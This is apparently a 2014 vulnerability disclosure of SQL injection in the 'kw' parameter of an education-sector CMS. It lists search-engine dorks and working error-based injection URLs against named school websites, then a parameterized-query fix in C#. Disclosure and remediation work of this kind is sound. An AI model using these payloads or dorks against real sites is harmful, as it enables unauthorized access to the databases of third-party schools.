
Generic SQL injection in an education-sector CMS

2014-12-26 23:20

Site platform: ASPX + MSSQL

Vulnerability type: SQL injection

Defective file: SubSiteMoreIndex.aspx

Injected parameter: kw

Affected versions: all versions

Severity: high

Vendor: ECS (易创思) official site | Shanghai Hongyu Information Technology Co., Ltd. (上海弘育信息技术有限公司)

Vendor website: http://www.ecs.cn/

Install base: very large

Source code analysis available: none yet

Default configuration: yes

Search keywords: inurl:NewsIndex.aspx?pkId=

inurl:SubSiteMoreIndex.aspx

Affected users:

(screenshot of affected sites omitted)





A few test examples:

http://www.zjhzyg.net/OperationManage/SubSiteMoreIndex.aspx?pkId=511&subSiteId=256&kw=Xasd%25%27&st=1&t=1

http://syzx.dyedu.cn/OperationManage/SubSiteMoreIndex.aspx?pkId=15&subSiteId=2&kw=Xasd%25%27&st=1&t=1

http://www.qzxx.net/OperationManage/SubSiteMoreIndex.aspx?pkId=511&subSiteId=29&kw=asdk%%27&st=1&t=1

http://www.hzjys.net/OperationManage/SubSiteMoreIndex.aspx?pkId=1697&subSiteId=285&kw=asda%%27%20and%201=@@version--&st=1&t=1

http://www.yclfzx.com/OperationManage/SubSiteMoreIndex.aspx?pkId=15&subSiteId=2&kw=asd%%27%20and%201=db_name()--&st=1&t=1

http://www.ycdlzx.com/OperationManage/SubSiteMoreIndex.aspx?pkId=140&subSiteId=3&kw=as%%27%20and%201=db_name()--&st=1&t=1





Because a valid subSiteId is fairly hard to obtain, you have to look carefully for one...



Examples:

1.

http://www.zjhzyg.net/OperationManage/SubSiteMoreIndex.aspx?pkId=511&subSiteId=256&kw=Xasd%25%27%20and%201=db_name()--&st=1&t=1

(screenshot omitted)

2.

http://syzx.dyedu.cn/OperationManage/SubSiteMoreIndex.aspx?pkId=15&subSiteId=2&kw=Xasd%25%27%20and%201=@@version--&st=1&t=1

(screenshot omitted)

3.

http://www.qzxx.net/OperationManage/SubSiteMoreIndex.aspx?pkId=511&subSiteId=29&kw=asdk%%27&st=1&t=1

(screenshot omitted)

4.

http://www.hzjys.net/OperationManage/SubSiteMoreIndex.aspx?pkId=1697&subSiteId=285&kw=asda%%27%20and%201=@@version--&st=1&t=1

(screenshot omitted)



Proof of vulnerability:

5.

http://www.yclfzx.com/OperationManage/SubSiteMoreIndex.aspx?pkId=15&subSiteId=2&kw=asd%%27%20and%201=db_name()--&st=1&t=1

(screenshot omitted)

6.

http://www.ycdlzx.com/OperationManage/SubSiteMoreIndex.aspx?pkId=140&subSiteId=3&kw=as%%27%20and%201=user--&st=1&t=1

(screenshot omitted)

Fix:

Filter the input (the kw parameter must not be concatenated into the SQL statement).
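The test URLs above show that kw is placed directly inside a LIKE string literal, so a single quote in kw ends the literal and the rest of the value runs as SQL. The durable fix is a bound parameter rather than a blacklist. The following is an added example for an ASPX + MSSQL page, not the vendor's code; the table name dbo.Articles, the column names and the helper names are assumptions.

```csharp
// Added example (not the vendor's code): parameterized keyword search for the kw
// parameter of a page like SubSiteMoreIndex.aspx. Table/column names are assumed.
using System;
using System.Collections.Generic;
using System.Data;
using System.Data.SqlClient;

public static class SubSiteSearch
{
    // Escape the SQL Server LIKE wildcards so the keyword is matched literally.
    // This is only about match semantics; the parameter binding below is what
    // prevents a quote in kw from terminating the string literal.
    public static string EscapeLike(string s)
    {
        return s.Replace("[", "[[]").Replace("%", "[%]").Replace("_", "[_]");
    }

    // subSiteId is bound as an int, kw as a bounded nvarchar. A value such as
    // "Xasd%' and 1=db_name()--" is therefore just a (non-matching) search term.
    public static List<string> SearchTitles(string connectionString, int subSiteId, string kw)
    {
        const string sql =
            "SELECT TOP (50) Title FROM dbo.Articles " +
            "WHERE SubSiteId = @subSiteId AND Title LIKE @kw";

        var titles = new List<string>();
        using (var conn = new SqlConnection(connectionString))
        using (var cmd = new SqlCommand(sql, conn))
        {
            cmd.Parameters.Add("@subSiteId", SqlDbType.Int).Value = subSiteId;
            cmd.Parameters.Add("@kw", SqlDbType.NVarChar, 200).Value =
                "%" + EscapeLike(kw ?? string.Empty) + "%";

            conn.Open();
            using (var rdr = cmd.ExecuteReader())
            {
                while (rdr.Read())
                    titles.Add(rdr.GetString(0));
            }
        }
        return titles;
    }

    // Page-side handling of the query string: numeric ids are parsed, not
    // concatenated, and an unparsable id is rejected before any SQL runs.
    public static List<string> HandleRequest(string connectionString,
                                             string subSiteIdParam, string kwParam)
    {
        int subSiteId;
        if (!int.TryParse(subSiteIdParam, out subSiteId) || subSiteId <= 0)
            throw new ArgumentException("invalid subSiteId");

        string kw = (kwParam ?? string.Empty).Trim();
        if (kw.Length > 100)
            kw = kw.Substring(0, 100);

        return SearchTitles(connectionString, subSiteId, kw);
    }
}
```

In the code-behind the call would be HandleRequest(connStr, Request.QueryString["subSiteId"], Request.QueryString["kw"]). The same pattern applies to pkId, st and t: every value from the query string is either parsed into a typed parameter or bound as a string parameter, and no part of the statement is built by string concatenation.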

Source: www.wooyun.org/bugs/wooyun-2014-077491

Reads: 109478 | Comments: 0 | Tags: injection cms
